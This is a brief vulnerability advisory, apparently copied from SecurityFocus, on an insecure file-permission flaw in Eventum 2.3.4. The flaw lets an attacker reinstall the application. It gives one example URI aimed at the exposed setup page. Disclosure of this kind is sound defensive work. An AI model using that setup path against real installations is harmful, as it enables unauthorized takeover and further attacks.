Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
source: https://www.securityfocus.com/bid/65186/info

Eventum is prone to an insecure file-permission vulnerability.

An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks.

Eventum 2.3.4 is vulnerable; other versions may also be affected. 

Following example URI is available.

http://www.example.com/setup/index.php